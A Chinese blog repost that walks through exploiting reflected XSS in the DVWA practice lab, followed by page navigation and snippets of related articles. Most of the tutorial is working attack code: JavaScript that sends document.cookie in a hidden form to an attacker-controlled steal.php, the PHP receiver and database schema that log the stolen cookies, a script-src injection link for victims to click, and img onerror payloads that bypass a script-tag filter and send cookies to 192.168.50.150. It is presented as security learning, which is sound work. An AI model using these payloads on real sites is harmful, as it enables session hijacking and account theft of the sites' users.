信息安全之路-web-xss学习(1)

最新推荐文章于 2022-05-02 12:19:40 发布
最新推荐文章于 2022-05-02 12:19:40 发布
阅读量160 收藏
点赞数
文章标签: php 数据库
原文链接:http://www.cnblogs.com/qianxinggz/p/9826158.html
版权

关于xss反射性漏洞

1.未加任何过滤的

(1).dvwa平台上可以看到源代码,如下

low级别

为了便于理解,代码如下:

<?php

// Is there any input?

if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL )

{// Feedback for end user

echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';

}

?> 

判断是否存在name参数且该参数是否为空,不为空则输出Hello,和该参数的值

 

(2).如果输出<script>alert(0)</script>,则浏览器端接收到传来的服务端处理后的js代码就会直接解析执行

 

 

(这里做过实验,如果在浏览器端打开服务端js代码则直接看到源代码,不执行,所以说服务端处理后的js代码)

Ps:笔者在学习时设置了代理。IP会变,做的时候可以考虑该原因

(3) .当我们已知该漏洞时,考虑利用<script src=http://xxx></script>来执行外部js文件,从而在js中实现预先设置和更为强大的功能,如下,设置了获取cookie的源代码

Js代码:(一定要细心,笔者在此出错甚多,导致耗时太多,比如action后网址正确,要有http//,在浏览器端输入时会自动加上,但构造payload时会忘掉)

document.write("<form action='http://www.dvwa1.com/dvwaxss/steal.php' name='exploit' method='post' style='display:none'>");

document.write("<input type='hidden' name='data' value='"+document.cookie+"'>");

document.write("</form>");

document.exploit.submit();

这段js代码的作用是在页面中构造一个隐藏表单和一个隐藏域,内容为当前的cookie,并且以post方式发送到同目录下的steal.php。

Php代码:(同上,写php代码时一定要细心,比如:$_POST不能少了_符号,低级错误,哎)

<?php

header("content-type:text/html;charset=utf-8");

$conn=mysql_connect("localhost","root","root");

mysql_select_db("dvwacookie",$conn);if(isset($_GET['data']))

{

    $sql="insert into low(cookie) values('".$_GET['data']."');";

    $result=mysql_query($sql,$conn);

    mysql_close();

}else if(isset($_POST['data']))

{

    $sql="insert into low(cookie) values('".$_POST['data']."');";

    $result=mysql_query($sql,$conn);

    mysql_close();

}else

{

    $sql="select * from low";

    $result=mysql_query($sql,$conn);

    while($row=mysql_fetch_array($result))

    {

        echo "偷取的cookie:".$row[1]."</br>";

    }

    mysql_close();

}?>

steal.php将我们获取到的cookie存到数据库中。

create database dvwacookie;

use dvwacookie;

create table low(id int not null auto_increment primary key,cookie varchar(100) not null);

create table medium(id int not null auto_increment primary key,cookie varchar(100) not null);

create table high(id int not null auto_increment primary key,cookie varchar(100) not null);

接下来我们在有xss漏洞的位置插入。

<script src=http://www.dvwa1.com/dvwaxss/cookie.js></script>

相当于构造链接。

http://www.dvwa1.com/dvwaxss/cookie.js?name=<script src=http://192.168.50.150/dvwaxss/cookie.js></script>

将链接发给该网站下的受害者,受害者点击时就会加载远程服务器(这里是win7)的cookie.js脚本,这里要提一点,用src加载远程服务器的js脚本,那么js的源就会变成加载它的域,从而可以读取该域的数据。

这时,数据库就接收到了cookie。

 

High级别

High利用正则过滤了script标签,需要绕过,那就不使用<script>标签,使用

<img src=#οnerrοr=(location.href="http://192.168.50.150/dvwaxss/steal.php?data="+document.cookie)>

这样同样可以出发js事件,服务端在解析时并不会解析Iuicode编码,而是到了html页面端会有解析,从而执行。

注意以上payload和这个区别:(引号结尾在document之前)

<img src=# οnerrοr=(location.href="http://www.dvwa1.com/dvwaxss/steal.php?data=+document.cookie")>

 注意onerror后面会被当作js事件执行

 本文代码和理解参考:http://www.freebuf.com/articles/web/157953.html

 

转载于:https://www.cnblogs.com/qianxinggz/p/9826158.html

a6831115
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web应用安全:XSS安全隐患产生原因.pptx
06-18
XSS安全隐患产生原因 1 XSS安全隐患 目录 2 XSS安全隐患产生原因 XSS安全隐患 1、网络钓鱼,包括盗取各类用户账号; 2、窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份进一步对网站执行操作; 3、劫持...
XSS漏洞常见攻击方式
天天学安全专属博客
10-08 3942
1.危害 都是通过js脚本来实现的浏览器内核版本也会影响到js代码的实现 1、钓鱼欺骗 2、网站挂马 3、身份盗用 4、盗取网站用户信息 5、垃圾信息发送 6、劫持用户Web行为 7、XSS蠕虫 2.原理 XSS 属于被动式的攻击。攻击者先构造一个跨站页面,利用script、、等各种方式使得用户浏览这个页面时,触发对被攻击站点的http 请求。此时,如果被攻击者如果已经在被攻击站点登录,就会持有该站点cookie。这样该站点会认为被攻击者发起了一个http 请求。而实际
针对Fortify工具扫描出几大漏洞的解决办法总结--1
热门推荐
abcxy12336的博客
08-27 3万+
Fortify是一款能扫描分析代码漏洞的强大工具,这里就不详细介绍,有兴趣了解的同学可以自己找些相关资料来看看。 本人在实际工作中遇到以下漏洞,结合他人经验及自己的理解总结出一些相关解决方式,如有不足之处还望批评指正。 1.System Information Leak 系统信息泄露:当系统数据或调试信息通过输出流或者日志功能流出程序时,就会发生信息泄漏。 看下面两段代码: out.
Cross-Site Scripting: Persistent XSS 漏洞修复笔记
dazhong2012的专栏
03-14 1万+
最近,项目工程进行 代码安全扫描 的过程中产生了一个 XSS 相关的bug,在此记录解决办法,和大家分享。 一.问题描述 漏洞扫描过程中报下面缺陷信息,大致意思是说 由于页面在接收参数的过程中,没有进行参数的校验,可能存在 参数中存在可执行代码的漏洞。 Cross-Site Scripting: Persistent Critical Package: /WEB-INF/views/xx xx-w...
复现thinkphp5.1反序列化漏洞
桃雾雨Rain的博客
05-02 1237
首先写一个控制器: <?php namespace app\index\controller; class Index { public function index() { if(isset($_POST['data'])){ @unserialize($_POST['data']); } highlight_string(file_get_contents(__FILE__)); } }
web漏洞-XSS
qq_21193587的博客
05-31 4817
XSS 漏洞介绍 XSS 攻击是指在网页中嵌入一段恶意的客户端 Js 脚本代码片段,JS 脚本恶意代码可以获取用户的 Cookie、URL 跳转、内容篡改、会话劫持……等。 漏洞危害 xss 攻击手段本身对服务端没有直接的危害,xss 主要是借助网站传播;一般通过留言板、邮件、等其他途径向受害者发送一段恶意的 URL,受害者通过访问该恶意 URL 可能会导致恶意的 xss 脚步会在受害者的客户端浏览器中执行,实现自己的目的 漏洞原理 XSS 的攻击类别分为:反射型、存储型、DOM 型等三大类攻击类别。 反射
Web应用安全:XSS盗取cookiepayload.pptx
06-18
Cookie 并不是它的原意“甜饼”的意思, 而是一个保存在客户机中的简单的文本文件, 这个文件与特定的 Web 文档关联在一起, 保存了该客户机访问这个Web 文档时的信息, 当客户机再次访问这个 Web 文档时这些信息可供该...
Web应用安全:存储型XSS.pptx
06-18
1.攻击者在交互页面输入恶意代码,然后提交到web程序,如果web程序对输入内容没有做XSS的防范,就会将恶意代码存储到数据库中。 2.接下来只要有用户去访问和查看攻击者提交的内容,当web应用响应用户请求时,恶意...
Web应用安全:反射型XSS.pptx
06-18
反射型XSS大多数是用来盗取用户的Cookie信息 特点是非持久化,也不存入网站服务器中,web后端漏洞。 反射型XSS简介 1.反射型XSS的缺点 必须用户点击带有特定恶意脚本代码参数的链接才能执行 恶意代码存放在url中,...
awesome-web-hacking:Web应用程序安全性列表
02-13
该列表适用于希望了解Web应用程序安全性但没有起点的任何人。 您可以发送“拉取请求”添加更多信息,以提供帮助。 如果您不希望进行@infoslack可以通过@infoslack发送给我 目录 图书 Web应用程序黑客手册:发现和...
XSS跨站脚本攻击
末初的CSDN博客
08-12 415
文章目录同源策略什么是XSS反射型XSS存储型XSSDOM型XSSXSS的防御 同源策略 当我们使用浏览器浏览多个网页的时候,浏览器怎样才能判断我们浏览的是同一网页? SOP(Same Origin Policy)同源策略,是一种约定也是浏览器最核心的基本安全功能。浏览器的同源策略,限制了来自不同源的文本或脚本对当前文本或脚本的读取或修改某些属性,同源策略主要检查源中的: Protocol Host Port 只有当两个不同起源的协议、主机、端口都相同时,浏览器才会认为这是同一个网站,即允
taint源码分析与使用介绍
weixin_30300523的博客
10-12 467
一、介绍 动态污点分析(Dynamic Taint Analysis,DTA)是一种动态信息流分析方法,其跟踪程序运行时对数据的处理,并记录处理过程中数据的传播,污点分析的目的是找出目的数据结果与源数据之间的依赖关系。污点分析可以分为三个方面:污点标记、污点传播和污点检查。污点标记是指来自网络等不可信渠道的数据都会被标记为“污点”。在污点标记后,污点数据进行各种运算所得的结果也是不可信的,因此也...
isset()和empty()区别,及判断$_post['']时问题
wangyangyang787的博客
03-01 4061
isset()函数主要是判断检测变量是否设置,并且不是 NULL。      empty()函数主要判断是否为空值;判断一个变量是否被认为是空的。当一个变量并不存在,或者它的值等同于FALSE,那么它会被认为不存在。如果变量不存在的话,empty()并不会产生警告。 <?php  var_dump(isset($m));    var_dump(empty($m));
web 表单自定义字段_带有自定义服务器字段验证的AJAX表单提交
cunchi8090的博客
07-21 437
web 表单自定义字段Overview 总览 This article presents a method for validating form data in a PHP script using custom server side validation rules. The example presented uses AJAX to submit data to the scrip...
!isset($_post['submit1']) php,使用if(isset($ _ POST ['submit']))在脚本打开时不显示echo不起作用...
weixin_32723617的博客
04-09 358
我的if(isset($_POST['submit']))代码有点问题。我想要的是当脚本打开时不会出现一些回声和表格,但我确实希望它在单击表单的提交按钮时显示。问题是,当我包含if(isset($_POST['submit']))函数时,当我点击提交按钮时,它根本不显示回声和表格。为什么是这个,请你帮我解决这个问题。以下是代码:Exam InterfaceNOTE: If a search box...
php taint扩展,检测XSS漏洞的扩展 PHP Taint
weixin_28843191的博客
03-20 495
PHP Taint 从PHP语言层面去分析,找出一些可能的XSS漏洞代码.启用这个扩展以后, 如果在一些关键函数(或者语句: echo, print, system, exec, 等等), 或者输出的地方*直接*(没有经过转义, 安全过滤处理)使用了来自$_GET, $_POST或者$_COOKIE的数据, 则Taint就会提示你:$a = trim($_GET['a']);$file_name ...
PHP扩展--taint检测隐藏漏洞
weixin_30458043的博客
05-12 72
简介 Taint 可以用来检测隐藏的XSS code, SQL注入, Shell注入等漏洞, 并且这些漏洞如果要用静态分析工具去排查, 将会非常困难, 比如对于如下的例子: <?php echo $_GET["name"]; ?> 对于请求: http://localhost/?name=222 静态分析工具, 往往无能为力, 而Tain...
web安全之kali-xss-beef剑心哥哥
最新发布
12-24
BeEF(浏览器控制框架)是一个用于检测和利用Web浏览器漏洞的工具,可以用于执行XSS攻击,获取用户浏览器的信息和控制用户的浏览器。在Kali Linux中结合使用XSS和BeEF可以实现对网站的全面安全检测和攻击。 “剑心...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值